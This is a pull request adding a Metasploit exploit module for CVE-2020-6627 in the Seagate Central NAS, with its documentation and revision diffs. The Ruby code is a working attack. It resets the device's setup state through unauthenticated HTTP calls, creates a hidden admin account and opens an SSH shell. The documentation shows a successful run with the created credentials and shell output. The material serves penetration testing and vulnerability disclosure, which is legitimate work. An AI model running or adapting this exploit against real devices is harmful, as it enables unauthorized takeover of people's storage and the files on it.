### PR TITLE
Adding Seagate Central Storage SSH User Add (CVE-2020-6627) Module

### DIFF
--- a/documentation/modules/exploit/linux/http/seagate_central_ssh_user_add.md
+++ b/documentation/modules/exploit/linux/http/seagate_central_ssh_user_add.md
@@ -1,7 +1,7 @@
 ## Description
 This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device. (CVE-2020-6627)
-Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to changes the device state 
-and register a new admin user witch is capable of ssh access.
+Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state 
+and register a new admin user which is capable of SSH access.
 
 ## Vulnerable Application 
 Seagate Central is your personal cloud, providing a centralized location to store your files
@@ -17,7 +17,6 @@ read more : https://www.seagate.com/files/www-content/support-content/external-p
   2. Start msfconsole
   3. Do: `use exploit/linux/http/seagate_central_ssh_user_add`
   4. Do: `set rhost <ip>`
-  5. Do: `set rport <port>`
   5. Do: `check`
 ```
 [+] 192.168.1.20:80 The target is vulnerable.
@@ -28,8 +27,6 @@ read more : https://www.seagate.com/files/www-content/support-content/external-p
 msf5 > use exploit/linux/http/seagate_central_ssh_user_add 
 msf5 exploit(linux/http/seagate_central_ssh_user_add) > set rhost 192.168.1.27
 rhost => 192.168.1.27
-msf5 exploit(linux/http/seagate_central_ssh_user_add) > set rport 80
-rport => 80
 msf5 exploit(linux/http/seagate_central_ssh_user_add) > run
 
 [*] Current device state: social

--- a/documentation/modules/exploit/linux/http/seagate_central_ssh_user_add.md
+++ b/documentation/modules/exploit/linux/http/seagate_central_ssh_user_add.md
@@ -17,7 +17,7 @@ read more : https://www.seagate.com/files/www-content/support-content/external-p
   2. Start msfconsole
   3. Do: `use exploit/linux/http/seagate_central_ssh_user_add`
   4. Do: `set rhost <ip>`
-  6. Do: `check`
+  5. Do: `check`
 ```
 [+] 192.168.1.20:80 The target is vulnerable.
 ```

--- a/documentation/modules/exploit/linux/http/seagate_central_ssh_user_add.md
+++ b/documentation/modules/exploit/linux/http/seagate_central_ssh_user_add.md
@@ -17,7 +17,7 @@ read more : https://www.seagate.com/files/www-content/support-content/external-p
   2. Start msfconsole
   3. Do: `use exploit/linux/http/seagate_central_ssh_user_add`
   4. Do: `set rhost <ip>`
-  5. Do: `check`
+  6. Do: `check`
 ```
 [+] 192.168.1.20:80 The target is vulnerable.
 ```

--- a/documentation/modules/exploit/linux/http/seagate_central_ssh_user_add.md
+++ b/documentation/modules/exploit/linux/http/seagate_central_ssh_user_add.md
@@ -1,0 +1,45 @@
+## Description
+This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device. (CVE-2020-6627)
+Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to changes the device state 
+and register a new admin user witch is capable of ssh access.
+
+## Vulnerable Application 
+Seagate Central is your personal cloud, providing a centralized location to store your files
+from your Windows and Mac, mobile devices, and social networks. Play movies and music
+and view photos from Seagate Central throughout your home on your smart TV, game
+console, and tablet, and on an Internet-connected mobile device while on the road. With
+Seagate Central, you can keep your digital life centralized and organized. 
+read more : https://www.seagate.com/files/www-content/support-content/external-products/seagate-central/en-us/seagate-central-user-guide-us.pdf
+
+## Verification Steps
+
+  1. Install the application
+  2. Start msfconsole
+  3. Do: `use exploit/linux/http/seagate_central_ssh_user_add`
+  4. Do: `set rhost <ip>`
+  5. Do: `set rport <port>`
+  5. Do: `check`
+```
+[+] 192.168.1.20:80 The target is vulnerable.
+```
+
+## Scenarios
+```
+msf5 > use exploit/linux/http/seagate_central_ssh_user_add 
+msf5 exploit(linux/http/seagate_central_ssh_user_add) > set rhost 192.168.1.27
+rhost => 192.168.1.27
+msf5 exploit(linux/http/seagate_central_ssh_user_add) > set rport 80
+rport => 80
+msf5 exploit(linux/http/seagate_central_ssh_user_add) > run
+
+[*] Current device state: social
+[+] State successfully changed !
+[*] Creating new admin user...
+[*] User: jesse3233
+[*] Pass: OdSvdFcT
+[+] 192.168.1.27:80 - Login Successful (jesse3233:OdSvdFcT)
+[*] Found shell.
+
+id
+uid=1001(jesse3233) gid=1001
+```

--- a/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
+++ b/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
@@ -1,0 +1,215 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'net/http'
+require 'net/ssh'
+require 'net/ssh/command_stream'
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::SSH
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'           => "Seagate Central Remote Code Execution Exploit",
+      'Description'    => %q{
+        This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.
+        Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to changes the device state
+        and register a new admin user witch is capable of ssh access.
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          'Ege Balcı <egebalci@pm.me>' # author & msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'],
+          ['CVE','2020-6627']
+        ],
+      'DefaultOptions'  =>
+        {
+          'SSL' => false,
+          'WfsDelay' => 5,
+        },
+      'Platform'       => ['unix'],
+      'Arch'           => [ARCH_CMD],
+      'Payload'        =>
+      {
+        'Compat' => {
+          'PayloadType'    => 'cmd_interact',
+          'ConnectionType' => 'find'
+        }
+      },
+      'Targets'        =>
+        [
+          ['Auto',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD
+            }
+          ],
+        ],
+      'Privileged'     => true,
+      'DisclosureDate' => "Dec 9 2019",
+      'DefaultTarget'  => 0
+    ))
+
+
+    register_options(
+      [
+        OptString.new('USER', [ true, 'Seagate Central SSH user', '']),
+        OptString.new('PASS', [ true, 'Seagate Central SSH user password', ''])
+      ], self.class
+    )
+
+    register_advanced_options(
+      [
+        OptBool.new('SSH_DEBUG', [ false, 'Enable SSH debugging output (Extreme verbosity!)', false]),
+        OptInt.new('SSH_TIMEOUT', [ false, 'Specify the maximum time to negotiate a SSH session', 30])
+      ]
+    )
+
+  end
+
+  def check
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/get_firmware"),
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      }
+    },60)
+
+    if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916')
+      Exploit::CheckCode::Vulnerable
+    else
+      Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+
+    # First get current state
+    first_state=get_state()
+    print_status("Current device state: #{first_state['state']}")
+    if first_state['state'] != 'start'
+      # Set new start state
+      first_state['state'] = 'start'
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri' => normalize_uri(target_uri.path,'/index.php/Start/set_start_info'),
+        'ctype' => 'application/x-www-form-urlencoded',
+        'data'  => "info=#{first_state.to_json}"
+      },60)
+
+      changed_state=get_state()
+      if changed_state['state'] == 'start'
+        print_good("State successfully changed !")
+      else
+        print_error("Could not change device state")
+        return
+      end
+    end
+
+    name = Rex::Text.rand_name_male
+    user = datastore['USER']
+    pass = datastore['PASS']
+    if user == ''
+      user = name+rand(1..9999).to_s
+    end
+    if pass == ''
+      pass = Rex::Text.rand_text_alpha(8)
+    end
+    print_status('Creating new admin user...')
+    print_status("User: #{user}")
+    print_status("Pass: #{pass}")
+
+    # Add new admin user
+    res = send_request_cgi({
+      'method'    => 'POST',
+      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/add_edit_user"),
+      'ctype' => 'application/x-www-form-urlencoded',
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      },
+      'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@test.com", isAdmin: true, uid: -1}), action: 1}
+    },60)
+
+
+    conn = do_login(user,pass)
+    if conn
+      print_good("#{rhost}:#{rport} - Login Successful (#{user}:#{pass})")
+      handler(conn.lsock)
+    end
+
+  end
+
+
+
+  def do_login(user, pass)
+    factory = ssh_socket_factory
+    opts = {
+      :auth_methods    => ['password', 'keyboard-interactive'],
+      :port            => 22,
+      :use_agent       => false,
+      :config          => false,
+      :password        => pass,
+      :proxy           => factory,
+      :non_interactive => true,
+      :verify_host_key => :never
+    }
+
+    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(rhost, user, opts)
+      end
+    rescue Rex::ConnectionError
+      return
+    rescue Net::SSH::Disconnect, ::EOFError
+      print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
+      return
+    rescue ::Timeout::Error
+      print_error "#{rhost}:#{rport} SSH - Timed out during negotiation"
+      return
+    rescue Net::SSH::AuthenticationFailed
+      print_error "#{rhost}:#{rport} SSH - Failed authentication"
+    rescue Net::SSH::Exception => e
+      print_error "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}"
+      return
+    end
+
+    if ssh
+      conn = Net::SSH::CommandStream.new(ssh)
+      ssh = nil
+      return conn
+    end
+
+    return nil
+  end
+
+  def get_state
+    res = send_request_cgi({
+      'method'    => 'GET',
+      'uri'       => normalize_uri(target_uri.path,"/index.php/Start/json_get_start_info"),
+      'headers' => {
+        'X-Requested-With' => 'XMLHttpRequest'
+      }
+    },60)
+
+    if res && (res.code == 200 ||res.code == 100)
+      return res.get_json_document
+    else
+      print_error("Could not determine current state")
+      Exploit::CheckCode::Safe
+    end
+
+  end
+
+end

--- a/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
+++ b/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Seagate Central Remote Code Execution Exploit",
+      'Name'           => "Seagate Central External NAS Arbitrary User Creation",
       'Description'    => %q{
         This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.
         Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state

--- a/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
+++ b/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
@@ -171,7 +171,7 @@ class MetasploitModule < Msf::Exploit::Remote
         ssh = Net::SSH.start(rhost, user, opts)
       end
     rescue Rex::ConnectionError
-      return
+      fail_with Failure::Unreachable, 'Connection failed'
     rescue Net::SSH::Disconnect, ::EOFError
       print_error "#{rhost}:#{rport} SSH - Disconnected during negotiation"
       return

--- a/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
+++ b/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
@@ -14,7 +14,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Seagate Central Remote Code Execution Exploit",
+      'Name'           => "Seagate Central External NAS Arbitrary User Creation Exploit",
       'Description'    => %q{
         This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.
         Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to changes the device state

--- a/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
+++ b/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
@@ -18,7 +18,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'Description'    => %q{
         This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.
         Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to changes the device state
-        and register a new admin user witch is capable of ssh access.
+        and register a new admin user which is capable of SSH access.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -85,7 +85,7 @@ class MetasploitModule < Msf::Exploit::Remote
     },60)
 
     if res && res.body.include?('Cirrus NAS') && res.body.include?('2015.0916')
-      Exploit::CheckCode::Vulnerable
+      Exploit::CheckCode::Appears
     else
       Exploit::CheckCode::Safe
     end
@@ -95,7 +95,12 @@ class MetasploitModule < Msf::Exploit::Remote
 
     # First get current state
     first_state=get_state()
-    print_status("Current device state: #{first_state['state']}")
+    if first_state
+      print_status("Current device state: #{first_state['state']}")
+    else
+      return
+    end  
+
     if first_state['state'] != 'start'
       # Set new start state
       first_state['state'] = 'start'
@@ -107,7 +112,7 @@ class MetasploitModule < Msf::Exploit::Remote
       },60)
 
       changed_state=get_state()
-      if changed_state['state'] == 'start'
+      if changed_state && changed_state['state'] == 'start'
         print_good("State successfully changed !")
       else
         print_error("Could not change device state")
@@ -116,14 +121,9 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     name = Rex::Text.rand_name_male
-    user = datastore['USER']
-    pass = datastore['PASS']
-    if user == ''
-      user = name+rand(1..9999).to_s
-    end
-    if pass == ''
-      pass = Rex::Text.rand_text_alpha(8)
-    end
+    user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}"
+    pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8)
+    
     print_status('Creating new admin user...')
     print_status("User: #{user}")
     print_status("Pass: #{pass}")
@@ -136,7 +136,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'headers' => {
         'X-Requested-With' => 'XMLHttpRequest'
       },
-      'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@test.com", isAdmin: true, uid: -1}), action: 1}
+      'vars_post' => {user: JSON.dump({user: user, fullname: name, pwd: pass, email: "#{name}@localhost", isAdmin: true, uid: -1}), action: 1}
     },60)
 
 
@@ -205,11 +205,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     if res && (res.code == 200 ||res.code == 100)
       return res.get_json_document
-    else
-      print_error("Could not determine current state")
-      Exploit::CheckCode::Safe
     end
-
+    res = nil
   end
-
 end

--- a/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
+++ b/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
@@ -28,7 +28,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'References'     =>
         [
           ['URL', 'https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/'],
-          ['CVE','2020-6627']
+          ['CVE', '2020-6627']
         ],
       'DefaultOptions'  =>
         {

--- a/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
+++ b/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ],
         ],
-      'Privileged'     => true,
+      'Privileged'     => false,
       'DisclosureDate' => "Dec 9 2019",
       'DefaultTarget'  => 0
     ))

--- a/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
+++ b/modules/exploits/linux/http/seagate_central_ssh_user_add.rb
@@ -14,10 +14,10 @@ class MetasploitModule < Msf::Exploit::Remote
 
   def initialize(info={})
     super(update_info(info,
-      'Name'           => "Seagate Central External NAS Arbitrary User Creation Exploit",
+      'Name'           => "Seagate Central Remote Code Execution Exploit",
       'Description'    => %q{
         This module exploits the broken access control vulnerability in Seagate Central External NAS Storage device.
-        Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to changes the device state
+        Subject product suffers several critical vulnerabilities such as broken access control. It makes it possible to change the device state
         and register a new admin user which is capable of SSH access.
       },
       'License'        => MSF_LICENSE,
@@ -53,7 +53,7 @@ class MetasploitModule < Msf::Exploit::Remote
             }
           ],
         ],
-      'Privileged'     => false,
+      'Privileged'     => true,
       'DisclosureDate' => "Dec 9 2019",
       'DefaultTarget'  => 0
     ))
@@ -99,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
       print_status("Current device state: #{first_state['state']}")
     else
       return
-    end  
+    end
 
     if first_state['state'] != 'start'
       # Set new start state
@@ -123,7 +123,7 @@ class MetasploitModule < Msf::Exploit::Remote
     name = Rex::Text.rand_name_male
     user = datastore['USER'] || "#{Rex::Text.rand_name_male}{rand(1..9999).to_s}"
     pass = datastore['PASS'] || Rex::Text.rand_text_alpha(8)
-    
+
     print_status('Creating new admin user...')
     print_status("User: #{user}")
     print_status("Pass: #{pass}")


### PR DESCRIPTION
Bonjour again :hand:

This module exploits the broken access control vulnerability (CVE-2020-6627) of Seagate Central Storage NAS product and adds a new system user. An unauthenticated user can access the NAS device via adding a new system user with root privileges.

## Verification

List the steps needed to make sure this thing works

- [ ] Start `msfconsole`
- [ ] `use exploit/linux/http/seagate_central_ssh_user_add`
- [ ] Set `RHOST`
- [ ] Set `RPORT`
- [ ] Run `exploit`
- [ ] **Verify** that you are seeing `State successfully changed !`
- [ ] **Verify** that you are seeing `User: ...` and `Pass: ...`
- [ ] **Verify** that you are getting SSH session.

**Technical Details and MSF Module in Asciinema**
[https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/](https://pentest.blog/advisory-seagate-central-storage-remote-code-execution/)
